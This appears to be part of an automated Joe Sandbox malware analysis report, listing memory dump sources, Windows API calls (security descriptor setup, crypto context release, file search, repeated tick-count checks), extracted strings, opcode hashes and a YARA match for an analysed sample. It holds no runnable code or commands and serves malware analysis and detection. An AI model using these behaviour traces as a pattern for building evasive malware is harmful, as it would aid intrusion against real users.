      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $=$GetACP$GlobalReAlloc$J$KBDKAZ.DLL$Microsoft.Build.Framework.dll$Microsoft.Office.BusinessApplications.Runtime.intl.resources.dll$NetGetDisplayInformationIndex$NlsData001a.dll$NlsData0022.dll$PerfCounter.dll$PlaMig.dll$R$RtlCreateServiceSid$RtlQueryHeapInformation$System.Xml.dll$V$VarUI2FromCy$WMPEncEn.dll$WmiQueryAllDataA$XamlViewer_v0300.exe$acwow64.dll$api-ms-win-core-debug-l1-1-0.dll$api-ms-win-core-processthreads-l1-1-1.dll$api-ms-win-core-string-l1-1-0.dll$colorcpl.exe$comadmin.dll$evntcmd.exe$helpcins.dll$msctfui.dll$srcore.dll$wertyuiopasdfghjklzxcvbnm$wmiutils.dll$wudriver.dll
      • API String ID: 0-1618126529
      • Opcode ID: 10c136151ee4f2069b0dafc05781bd4c9fbc7b5384318e964855b9067dde7ae7
      • Instruction ID: e1bfc7529476952224456319fd71e6d4f0e63e04ef81fae256565360bd5caaf2
      • Opcode Fuzzy Hash: 10c136151ee4f2069b0dafc05781bd4c9fbc7b5384318e964855b9067dde7ae7
      • Instruction Fuzzy Hash: 44930274A0425D8FDB10DFA4DC81BDDBBF5FB09308F1090AAD408A7662E734AA89DF55
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,0087DC05,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8), ref: 0087C539
      • InitializeAcl.ADVAPI32(00000000,00000400,00000002,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8,0089B6AC), ref: 0087C637
      • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,00000074,?,0000000E,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?), ref: 0087C755
      • CreateWellKnownSid.ADVAPI32(00000001,00000000,?,00000074,00000006,008A9B84,00000006,008A9B7C,00000006,008A9A38,00000006,00000006,008A9B6C,00000006,00000006,008A9AF0), ref: 0087C90F
      • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,?,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8), ref: 0087C92C
      • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000,?,0000000E,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?), ref: 0087C9A8
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CreateDescriptorInitializeKnownSecurityWell$AccessAllowedDacl
      • String ID: $ $ $ $ $ $,y`~$BdeHdCfg.exe$CallNextHookEx$D,y`$EnumerateTraceGuidsEx$GetEnabledXStateFeatures$KBDSMSNO.DLL$MessageBoxA$NlsLexicons0027.dll$NtThawRegistry$TSpkg.dll$TpCallbackUnloadDllOnCompletion$`$aepic.dll$api-ms-win-core-libraryloader-l1-1-0.dll$dwmapi.dll$logoncli.dll$netstandard.dll$rdpcorets.dll
      • API String ID: 2450134216-175671456
      • Opcode ID: 511310ba4730daa6851b64ac9285cd0dba335a4c9a7894692d693002ef960081
      • Instruction ID: 3992e1403e9b5c8776297243210fc0ecee483a309be43561978049566767cd83
      • Opcode Fuzzy Hash: 511310ba4730daa6851b64ac9285cd0dba335a4c9a7894692d693002ef960081
      • Instruction Fuzzy Hash: 6BB23534A1521DCFDB00EFA4D881BDDB7B6FF49304F108066E844B7695D738AA4ACB66
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ ^$D,y`$KBDUZB.DLL$PCLXL.DLL$RegGetValueW$System.Web.DynamicData.Design.dll$VariantCopyInd$dsprov.dll$dwmapi.dll$mmcshext.dll$raserver.exe$wow64.dll$wuapi.dll
      • API String ID: 0-2227730283
      • Opcode ID: 771b376b7f97c8601e1a52d5fcbe12d0c22f26bd464a0fa7d94e8ee5eb1d9979
      • Instruction ID: 507a208060b2461cba0364fdbe80c7954836aa0660f1ce3053646711b380dff6
      • Opcode Fuzzy Hash: 771b376b7f97c8601e1a52d5fcbe12d0c22f26bd464a0fa7d94e8ee5eb1d9979
      • Instruction Fuzzy Hash: 2E537E3490829E8FDB11DF64D890BDDBBB5BF0A308F1040E6D448B77A2D634AA99CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $/$CasPol.exe$GetClassInfoExW$IMJPCLST.DLL$Microsoft.Build.Conversion.v3.5.dll$Microsoft.MediaCenter.iTV.dll$PostMig.exe$ZwReadOnlyEnlistment$cmi2migxml.dll$evntagnt.dll$msra.exe$secur32.dll$shwebsvc.dll$usercpl.dll$wpcmig.dll
      • API String ID: 0-598829326
      • Opcode ID: 5d5b376437f2a9b3a42bc52104574d10f0b344bae16a8f077b124a3af5015a8e
      • Instruction ID: 7c2c6b43ff34d7cd941693466faf59132d87e8d94f3068a3a5c03bd831f8545c
      • Opcode Fuzzy Hash: 5d5b376437f2a9b3a42bc52104574d10f0b344bae16a8f077b124a3af5015a8e
      • Instruction Fuzzy Hash: 7182E63491424E8FDB00DFA5C982BEEBBB5FF49304F108066E504B7295D734AE5ACB66
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299), ref: 0040CEA1
      • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040CEB2
      • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?), ref: 0040CFB2
      • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019), ref: 0040CFC4
      • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000), ref: 0040CFD0
      • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales), ref: 0040D015
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
      • String ID: GetLongPathNameW$\$kernel32.dll
      • API String ID: 1930782624-3908791685
      • Opcode ID: 513bc97edc3a285b3f4b4213d583ed833790a0ac4b592b607f87561b17950973
      • Instruction ID: 72a2b02610064fb6e64a347f8dccdb3cbd3b5c5928c9e3bd0ad0754b881fd8bf
      • Opcode Fuzzy Hash: 513bc97edc3a285b3f4b4213d583ed833790a0ac4b592b607f87561b17950973
      • Instruction Fuzzy Hash: E041A031E00619DBCB10EBA4CC85ADEB3B9EF44314F5486BA9544F72C1E77C9E468B89
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $,y`~$dpnlobby.dll
      • API String ID: 0-3916097650
      • Opcode ID: 4fcf8aecb6c4dd7e887d350c18a81c36cb5dfc523fbe96cafe5bbf09f2af229b
      • Instruction ID: bae1e69e6083ae284282e570cb1da161308b38c74c86f68681f2930064ed2e58
      • Opcode Fuzzy Hash: 4fcf8aecb6c4dd7e887d350c18a81c36cb5dfc523fbe96cafe5bbf09f2af229b
      • Instruction Fuzzy Hash: 2A324C34909269CFEB00DFA8E981ADDBBF5FB4A314F104066E485E7B61D734A942CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $NlsLexicons0007.dll$WMPEncEn.dll$WcsPlugInService.dll$imkrhjd.dll$msjter40.dll
      • API String ID: 0-2932531965
      • Opcode ID: f4a6143c48d78da2b6443c7aad68d7d5eac5de959938cf87e16649466a65ddb2
      • Instruction ID: bf32a8490e79fe6a535159b72d7fe53985cf89a186e1cfd71ff2ee7a7cb9dae1
      • Opcode Fuzzy Hash: f4a6143c48d78da2b6443c7aad68d7d5eac5de959938cf87e16649466a65ddb2
      • Instruction Fuzzy Hash: 307227349042598FDB11EF60C885BCDB7BABF4A308F5080E6D448B7252DB75AE89CF56
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0087AD6C,?,?,?,00000000,0087B0A4,?,?,?,?,00000000,00000000), ref: 0087AC4A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: ContextCryptRelease
      • String ID: MSTTSuser.dll$OleInitializeWOW$wcsstr
      • API String ID: 829835001-4194434045
      • Opcode ID: 9fc5af2e2b3fbf965cf0547e1570d710481e5c76869b64eaa0073ad2b132d942
      • Instruction ID: 60919dea1fde7c7290e1bc7affbee0b9452ec838a8e796b5fdac6bda563263ff
      • Opcode Fuzzy Hash: 9fc5af2e2b3fbf965cf0547e1570d710481e5c76869b64eaa0073ad2b132d942
      • Instruction Fuzzy Hash: 9932283480529DCFDB10DF60D881ACDB7BABF49304F5081E6D848B7256D775AA89CFA2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CryptReleaseContext.ADVAPI32(00000000,00000000,00884B38,008852E2,?,?,?,?,00000000,00000000,?,00888875,00000000,0088A2A0), ref: 00884A6C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: ContextCryptRelease
      • String ID: D,y`$api-ms-win-core-util-l1-1-0.dll
      • API String ID: 829835001-3654596676
      • Opcode ID: e72bdd19fac70373ab68961f9b74b878a17058238effaa2eae420ea01d9a4522
      • Instruction ID: a325787f50939f531d6cfea34497d2f82449af8cb1540bcdc645a1f0ab4add37
      • Opcode Fuzzy Hash: e72bdd19fac70373ab68961f9b74b878a17058238effaa2eae420ea01d9a4522
      • Instruction Fuzzy Hash: 5751E076A15229CFDB04EFA8E981ACDB7F4FB09318F11502AE001FB661D735A945CF25
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • IsValidLocale.KERNEL32(?,00000002,00000000,0040CB8D,?,?,?,00000000), ref: 0040CAD2
      • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040CB8D,?,?,?,00000000), ref: 0040CAEE
      • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040CB8D,?,?,?,00000000), ref: 0040CAFF
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Locale$Info$Valid
      • String ID:
      • API String ID: 1826331170-0
      • Opcode ID: dc98ea9a91aae6d5a0775f99af886e6dd3c62cdf4629cf988b7c1198aebb0fe8
      • Instruction ID: 23c11aa9885e3c916dff53f67515c36f66bc6504bb74cbc91727a7fed7d712bd
      • Opcode Fuzzy Hash: dc98ea9a91aae6d5a0775f99af886e6dd3c62cdf4629cf988b7c1198aebb0fe8
      • Instruction Fuzzy Hash: 2831AD70A00A1CEBEB20DB60DCC2B9B77B5FB44701F5006BAA509B32D1D6396E80CE19
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CryptDestroyHash.ADVAPI32(?), ref: 00883F70
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CryptDestroyHash
      • String ID: D,y`
      • API String ID: 174375392-3072986133
      • Opcode ID: ab67b30743256aee4ee3b9a1c14ddcbbbea7e189e2c09e5506ec39e4105f8026
      • Instruction ID: 50bff77f3e6df93792148fc9ba00fbee6659cfa749139e383dae911b241110e4
      • Opcode Fuzzy Hash: ab67b30743256aee4ee3b9a1c14ddcbbbea7e189e2c09e5506ec39e4105f8026
      • Instruction Fuzzy Hash: AA5210344052AE8FDB11DF24D880BC9BBB5BF56308F4491E6C488A7752D7B46B89CF92
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • FindFirstFileW.KERNEL32(00000000,?,00000000,?,00423677,00000000,?,?,?,00899A4F,EDBF3FA1,?,?,0089B6AC,?,00000074), ref: 004235CB
      • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00423677,00000000,?,?,?,00899A4F,EDBF3FA1,?,?,0089B6AC,?), ref: 004235D6
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Find$CloseFileFirst
      • String ID:
      • API String ID: 2295610775-0
      • Opcode ID: dc64fdd914615b049f7e817cb6537e09cab8c4ae1589e8d2fe4e5d1ed68ca6f5
      • Instruction ID: 01a03d814939720a58ed36e95a7979cf1404916787e28f7e552fe1288b409e44
      • Opcode Fuzzy Hash: dc64fdd914615b049f7e817cb6537e09cab8c4ae1589e8d2fe4e5d1ed68ca6f5
      • Instruction Fuzzy Hash: 77E0CD7161430C12C71065F91C8A7AB72DC5B44329F440BA7795CD21D2E63D8B90015D
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, Offset: 02766000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2766000_file.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
      • Instruction ID: c3ff1ecf0eff0b193b3fb83bef835454319a3be22d612f7f4ac43354c248dbb8
      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
      • Instruction Fuzzy Hash: 74118272740101AFD754DF55DCC4FA677EEEB89320B598065ED08CB312D67AE842C760
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B,?,?,00000000,00000000,00000000), ref: 0040CD5E
      • LeaveCriticalSection.KERNEL32(008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B,?,?,00000000,00000000), ref: 0040CD82
      • LeaveCriticalSection.KERNEL32(008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B,?,?,00000000,00000000), ref: 0040CD91
      • IsValidLocale.KERNEL32(00000000,00000002,008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B), ref: 0040CDA3
      • EnterCriticalSection.KERNEL32(008ADC14,00000000,00000002,008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B), ref: 0040CE00
      • LeaveCriticalSection.KERNEL32(008ADC14,008ADC14,00000000,00000002,008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B), ref: 0040CE29
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CriticalSection$Leave$Enter$LocaleValid
      • String ID: en-US,en,
      • API String ID: 975949045-3579323720
      • Opcode ID: 6ae5857e4506fbe12fe28e77ee88e855aae8d1fbab5fe6f337aed850c569c3ae
      • Instruction ID: 1e1d3b9349122117005ea94893b3b9f41c4e8d9279000f1fe72f09228e9374f1
      • Opcode Fuzzy Hash: 6ae5857e4506fbe12fe28e77ee88e855aae8d1fbab5fe6f337aed850c569c3ae
      • Instruction Fuzzy Hash: 48216220704710EBE710B76AC89275E2599EF46718B90453BB001F6BC2C9BC8C41D7AE
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: b3fb30baf3b69651b762d8113197e9e4446f399f61267d7f4205265ef8e08ec9
      • Instruction ID: e92eaf3ff3e09107ede235038e047a6ff9cc1d11e47e23f17a09ae4ad2eea443
      • Opcode Fuzzy Hash: b3fb30baf3b69651b762d8113197e9e4446f399f61267d7f4205265ef8e08ec9
      • Instruction Fuzzy Hash: E3C14572710A010BE714AA7D9C8476FB686DBC5325F18823FE215EB3D6EA7CCC558B48
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00408DBC: GetCurrentThreadId.KERNEL32 ref: 00408DBF
      • GetTickCount.KERNEL32 ref: 00408967
      • GetTickCount.KERNEL32 ref: 0040897F
      • GetCurrentThreadId.KERNEL32 ref: 004089AE
      • GetTickCount.KERNEL32 ref: 004089D9
      • GetTickCount.KERNEL32 ref: 00408A10
      • GetTickCount.KERNEL32 ref: 00408A3A
      • GetCurrentThreadId.KERNEL32 ref: 00408AAA
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CountTick$CurrentThread
      • String ID:
      • API String ID: 3968769311-0
      • Opcode ID: d8f76c9983ab303e4a2a6eb0811938a6070511537a287b3d8342561fb0ddf730
      • Instruction ID: 97f6f4a4bb359f6e06a49a51cc82c85dbc79a7bf2bbc3ca021f0fc766c487bd8
      • Opcode Fuzzy Hash: d8f76c9983ab303e4a2a6eb0811938a6070511537a287b3d8342561fb0ddf730
      • Instruction Fuzzy Hash: 454180706083419ED721AE7CC68432BBBD1AF90354F18893FD4D8977C2EE7888818B5B
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 004086BD
      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004086C3
      • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 004086DF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AddressErrorHandleLastModuleProc
      • String ID: @$GetLogicalProcessorInformation$kernel32.dll
      • API String ID: 4275029093-79381301
      • Opcode ID: df89b094c4fc9ecf5a0342b6ce30508c82d4132e246c04c3c4f41307faea38b2
      • Instruction ID: 15214c6c6b9f0fa70b4615478ddb3ab3236ccbb59b387d90588494102e7edd23
      • Opcode Fuzzy Hash: df89b094c4fc9ecf5a0342b6ce30508c82d4132e246c04c3c4f41307faea38b2
      • Instruction Fuzzy Hash: 5D117274D00208AEDB20EBA5CE45B6EB7B4DB45304F6084BFE854B72C1DB7C9A408F59
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258), ref: 00409969
      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C), ref: 0040996F
      • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000), ref: 0040998A
      • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?), ref: 00409990
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: FileHandleWrite
      • String ID: Error$Runtime error at 00000000
      • API String ID: 3320372497-2970929446
      • Opcode ID: 940674207d66ce2508097593aa5d6adaf40bf27376d7cd72aa1c20ae4ba549f0
      • Instruction ID: 66a8fc6f3927206ba17adebf6fa23ce3f892fd0946112a400a7a9d52c56287d1
      • Opcode Fuzzy Hash: 940674207d66ce2508097593aa5d6adaf40bf27376d7cd72aa1c20ae4ba549f0
      • Instruction Fuzzy Hash: EEF0AFE0640B00B8FA20A3916C17F2B2A58A702B25F54423FB220B9AD3C7BC48C44A69
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: ClearVariant
      • String ID: X*l
      • API String ID: 1473721057-3061925697
      • Opcode ID: e21ce2cafc081b25742dda36fe5fc48425e70b06716ac3f0bdea40936187c092
      • Instruction ID: e2579ad48a9ad2e6a598501fdd0bb7f9e1bcd0190c794d120b178e91e8997215
      • Opcode Fuzzy Hash: e21ce2cafc081b25742dda36fe5fc48425e70b06716ac3f0bdea40936187c092
      • Instruction Fuzzy Hash: 5D01B12270412086DB20BB34C886FB522DBEF05700B60947EB4069F317DB75CE86C7A7
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040CC35
      • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040CC93
      • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040CCF0
      • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040CD23
        • Part of subcall function 0040CBE0: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040CCA1), ref: 0040CBF7
